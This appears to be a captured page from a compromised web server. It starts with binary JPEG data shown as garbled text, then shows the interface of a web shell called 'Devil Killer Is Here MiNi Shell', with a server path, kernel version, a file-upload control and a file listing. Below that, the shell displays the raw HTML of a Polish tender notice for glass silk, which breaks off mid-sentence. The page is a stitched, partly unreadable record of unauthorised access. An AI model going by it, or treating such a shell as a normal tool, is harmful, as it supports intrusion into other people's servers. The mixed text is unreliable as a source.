JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230322/0014603101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa jedwabiu szklanego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SIEĆ BADAWCZA ŁUKASIEWICZ - INSTYTUT ELEKTROTECHNIKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 387388984</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mieczysława Pożaryskiego 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-703</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@iel.lukasiewicz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://iel.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Badania i rozwój. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa jedwabiu szklanego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-284cf3ac-c894-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00146031</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/iel <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Zamawiający wymaga aby wszyscy Wykonawcy dostarczyli niżej wymienione ilości próbek w celu wykazania parametrów techniczno-jakościowych dostarczonego jedwabiu szklanego. Pakiet I zamówienia - 2 szpule po 2 kg. pakiet II - 2 szpule po 3 kg. pakiet III - 2 szpule po 3 kg. 4.	Próbki jedwabiu szklanego muszą być dostarczone do siedziby Zamawiającego przed terminem składania ofert. Próbki należy dostarczyć na adres: Sieć Badawcza Łukasiewicz - Instytut Elektrotechniki, Magazyn – budynek B, ul. Wojska Polskiego 51, 57-530 Międzylesie, Polska. Próbki muszą być dostarczone Zamawiającemu w sposób uniemożliwiający ich uszkodzenie w czasie załadunku, transportu i rozładunku. <br/>Opakowanie zawierające próbkę musi być oznakowane w następujący sposób: Próbka jedwabiu szklanego – pakiet ….. Dotyczy sprawy nr ZP.2510.12.2023. Wykonawca: /nazwa, adres Wykonawcy/. Koszt pakowania, transportu, ewentualnego ubezpieczenia próbki spoczywa na Wykonawcy.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna stanowi integralną część Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2510.12.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa jedwabiu szklanego przeznaczonego do produkcji elastycznych koszulek elektroizolacyjnych różnych rozmiarów (średnic) poprzez nasycanie/ powlekanie półfabrykatu z przeznaczeniem do izolowania przewodów elektrycznych i połączeń w urządzeniach elektrycznych. Zamówienie składa się z 3 pozycji asortymentowych (pakiety). Wymagania zestawione poniżej dotyczą wszystkich pakietów (od I do III). Wygląd zewnętrzny: Nawoje jedwabiu szklanego powinny być bezzrywowo nawinięte na szpule. Budowa nawojów jedwabiu powinna być jednolita, a nawoje powtarzalne. Jedwab szklany musi być wolny od jakichkolwiek zabrudzeń i zanieczyszczeń (olej, brud, tłuszcz). Jedwab nie może zawierać żadnych wtrąceń - w szczególności metalicznych. Barwa jedwabiu musi być biała, nie może się zmieniać podczas starzenia. Niedopuszczalne jest przebarwienie jedwabiu w procesie technologicznym. Szpule muszą być nawinięte zwięźle i równo, z równomiernym naciągiem. Pakowanie pojedyncze/zbiorcze: Każdy pojedynczy nawój jedwabiu szklanego musi być owinięty białym papierem, a następnie umieszczony w kartonie. Kartony powinny być ustawione na palecie w dwóch warstwach. Paleta powinna być zabezpieczona przed oddziaływaniem warunków atmosferycznych (deszczu, wilgoci, zaprószenia). Oznakowanie pojedyncze: Każdy nawój jedwabiu szklanego powinien posiadać etykietę identyfikującą asortyment, nazwę producenta oraz datę produkcji. Oznakowanie zbiorcze: Każdy karton z jedwabiem szklanym musi być oznaczony etykietą identyfikującą asortyment, nazwę producenta, datę produkcji, ciężar brutto i netto. Dokumentacja: Do każdej dostawy musi być dołączone świadectwo jakości 3.1 z wynikami badań wystawione zgodnie z PN-EN 10204. Warunki magazynowania: Jedwab szklany przechowywany w szczelnie zamkniętych opakowaniach w pomieszczeniu o temperaturze od 15°C do 25°C musi gwarantować zachowanie właściwości przez okres co najmniej 6 miesięcy. Miejsce realizacji: Sieć Badawcza Łukasiewicz - Instytut Elektrotechniki, Magazyn – budynek B, ul. Wojska Polskiego 51, 57-530 Międzylesie, Polska. Wymagania techniczne (parametry): Pakiet nr I: Rodzaj szkła: E. Masa liniowa (ISO 1889) 68 + 5%, -7% tex Średnica nominalna włókna (ISO 1888) 6 ÷ 7 μm. Zawartość preparacji (ISO 1887) 0,7-1,4%. Wytrzymałość na rozciąganie (ISO 3341) ~ 470 mN/tex. Kierunek skrętu (ISO 1890) S. Ilość skrętów (ISO 1890) 100 ± 15% ilość/m. Ilość nici: 2. Rodzaj preparacji włókien: skrobiowa. Postać handlowa: Jedwab cylindrycznie nawinięty na szpule stożkowe plastikowe. Wysokość szpuli: ~ 350mm. Wysokość nawinięcia: ~ 310mm. Waga nawoju na szpuli: ~ 3kg. Wielkość Roczna: 6.000kg. Pakiet nr II: Rodzaj szkła: E. Masa liniowa (ISO 1889) 136 + 5%, -7% tex. Średnica nominalna włókna (ISO 1888) 9 μm. Zawartość preparacji (ISO 1887) 1,0 - 1,4%. Wytrzymałość na rozciąganie (ISO 3341) ~ 440 mN/tex. Kierunek skrętu (ISO 1890): S. Ilość skrętów (ISO 1890) 110 ± 10% ilość/m. Ilość nici: 2. Rodzaj preparacji włókien: skrobiowa. Postać handlowa: Jedwab cylindrycznie nawinięty na szpule stożkowe plastikowe. Wysokość szpuli: ~ 350mm. Wysokość nawinięcia: ~ 310mm. Waga nawoju na szpuli: ~ 3kg. Wielkość Roczna: 9.000kg. Pakiet III: Rodzaj szkła: E. Masa liniowa (ISO 1889) 204 + 5%, -7% tex. Średnica nominalna włókna (ISO 1888) 9 μm. Zawartość preparacji (ISO 1887) 1,0 - 1,4%. Wytrzymałość na rozciąganie (ISO 3341) ~ 410 mN/tex. Kierunek skrętu (ISO 1890): S. Ilość skrętów (ISO 1890) 100 ± 15% ilość/m. Ilość nici: 3. Rodzaj preparacji włókien: skrobiowa. Postać handlowa: Jedwab cylindrycznie nawinięty na szpule stożkowe plastikowe. Wysokość szpuli: ~ 350mm. Wysokość nawinięcia: ~ 310mm. Waga nawoju na szpuli: ~ 3kg. Wielkość Roczna: 4.000kg. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14830000-8 - Włókno szklane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W zależności od rzeczywistych potrzeb, Zamawiający zastrzega możliwość zastosowania prawa opcji („Wielkość Opcjonalna”), tzn. dostawy dodatkowych ilości zamawianego jedwabiu szklanego w maksymalnych ilościach: Pakiet I – 2.000kg; Pakiet II – 5.000kg; Pakiet III – 3.000kg. Wykonawcy nie przysługują kary ani żadne opłaty dodatkowe z powodu braku zakupu przez Zamawiającego Wielkości Opcjonalnej. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">365 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.<br/>Oferty będą oceniane metodą punktową w skali 100-punktowej, gdzie 1% równa się 1 punktowi.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji zamówienia jednostkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1/. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego; art. 108 ust. 1 pkt 1, 3, 4, 5 i w art. 109 ust. 1 pkt 5, 8, 10 ustawy Pzp. Wzór oświadczenia stanowi Załącznik nr 7 do SWZ. 2/. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1/. Próbki w ilościach: Pakiet I: 2 szpule po 2kg; Pakiet II: 2 szpule po 3 kg; Pakiet III: 2 szpule po 3 kg. 2/. Karty techniczne TDS. 3/. Karty charakterystyki MSDS zgodnie z aktualnym rozporządzeniem REACH wraz z dołączonymi do nich scenariuszami narażenia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1/. Próbki w ilościach: Pakiet I: 2 szpule po 2kg; Pakiet II: 2 szpule po 3 kg; Pakiet III: 2 szpule po 3 kg. 2/. Karty techniczne TDS. 3/. Karty charakterystyki MSDS zgodnie z aktualnym rozporządzeniem REACH wraz z dołączonymi do nich scenariuszami narażenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem. Wykonawcy zobowiązani są spełnić warunki określone w postępowaniu według wymagań określonych dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu. Wykonawcy wspólnie ubiegających się o udzielenie zamówienia dołączają do oferty oświadczenie przewidziane w art. 117 ustawy Pzp, z którego wynika, które dostawy wykonają poszczególni Wykonawcy - oświadczenie stanowi załącznik nr 6 do SWZ. Dokumenty Wykonawców wspólnie ubiegających się o udzielenie zamówienia podpisuje pełnomocnik. Przed odpisaniem umowy Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, w przypadku wyboru ich oferty jako najkorzystniejszej, przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w sytuacjach, których nie można było przewidzieć w dniu podpisania umowy, w szczególności dotyczące zmiany: a/. obowiązującej stawki VAT, b/. wysokości wynagrodzenia w razie pozbawienia Wykonawcy w trakcie trwania umowy statusu czynnego podatnika VAT lub rejestracji Wykonawcy jako czynnego podatnika VAT, c/. przepisów prawnych istotnych dla realizacji umowy, w zakresie w jakim jest to niezbędne do należytego wykonania umowy, d/. skrócenia terminu realizacji zamówienia w przypadku wystąpienia braku możliwości należytej realizacji świadczenia m.in. w przypadku trwałego zaostrzenia obowiązujących ograniczeń sanitarnych, e/. skutków działania siły wyższej w zakresie niezbędnym do należytego wykonania przedmiotu umowy. Siła wyższa stanowi zdarzenie nagłe, nieprzewidziane i niezależnie od woli Stron, którego skutki są niemożliwe do zapobieżenia, uniemożliwiające wykonanie umowy w całości lub części, na stale lub na pewien czas, któremu nie można zapobiec, ani przeciwdziałać przy zachowaniu należytej staranności. W sytuacji zaistnienia siły wyższej Strony niezwłocznie uzgodnią tryb dalszego postępowania.<br/>WALORYZACJA UMOWY: 1/. Zamawiający przewiduje możliwość zmiany cen jednostkowych, o których mowa w § 4 ust. 2 umowy w przypadku zmiany cen materiałów związanych z realizacją zamówienia. 2/. Poziom zmiany ceny materiałów uprawniający Wykonawcę do żądania zmiany wynagrodzenia ustala się na 15% brutto w stosunku do poziomu cen tych samych materiałów z dnia składania ofert. 3/. W sytuacji wzrostu ceny materiałów powyżej 15% brutto Wykonawca jest uprawniony złożyć Zamawiającemu pisemny wniosek o zmianę Umowy. 4/. We wniosku Wykonawca wskazuje materiały, których ceny ulegają zmianie, wraz z ich wysokością początkową (odpowiednio zgodnie z kalkulacją oferty albo ostatniej waloryzacji) i cen po zmianie wraz z podaniem wyczerpującego uzasadnienia faktycznego zmiany. Wniosek musi być poparty odpowiednimi dowodami potwierdzającymi zasadność jego złożenia. Przez dowody należy rozumieć w szczególności: faktury kosztowe surowców (kopie), kalkulacje własne, informacje od kontrahentów, które powodują zmianę ceny. Wniosek można złożyć nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy. Możliwe jest wprowadzanie kolejnych zmian wynagrodzenia z zastrzeżeniem, że będą one wprowadzane nie częściej niż co 3 kolejne miesiące. 5/. Zwaloryzowane ceny obejmować będą wyłącznie płatności za dostawy, które zostaną zgłoszone przez Zamawiającego do realizacji po dacie podpisania aneksu do umowy. 6/. Łączna wysokość wszystkich zmian nie może przekroczyć 30% ceny ofertowej brutto. 7/. Maksymalna wysokość wynagrodzenia, o którym mowa w § 4 ust. 1 Umowy pozostaje bez zmian. W przypadku wyczerpania tej kwoty, umowa wygasa. 8/. Waloryzacja wynagrodzenia musi być dokonana pod rygorem nieważności w formie pisemnego aneksu do umowy. 9/. Wykonawca, którego wynagrodzenie zostało zmienione, zobowiązany jest do proporcjonalnej zmiany wynagrodzenia przysługującego Podwykonawcom i dalszym Podwykonawcom, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania Podwykonawców i dalszych Podwykonawców. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym http://iel.ezamawiajacy.pl Próbki należy dostarczyć na adres: Sieć Badawcza Łukasiewicz - Instytut Elektrotechniki, Magazyn – budynek B, ul. Wojska Polskiego 51, 57-530 Międzylesie, Polska.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-04</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I/. Z postępowania o udzielenie zamówienia Zamawiający wykluczy Wykonawcę w przypadku stwierdzenia, że wystąpiła wobec niego którakolwiek z przesłanek wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022, poz. 835).<br/>II/. Próbki. Wymagane jest dostarczenie niżej wymienionych ilości próbek, które są niezbędne do wykazania parametrów 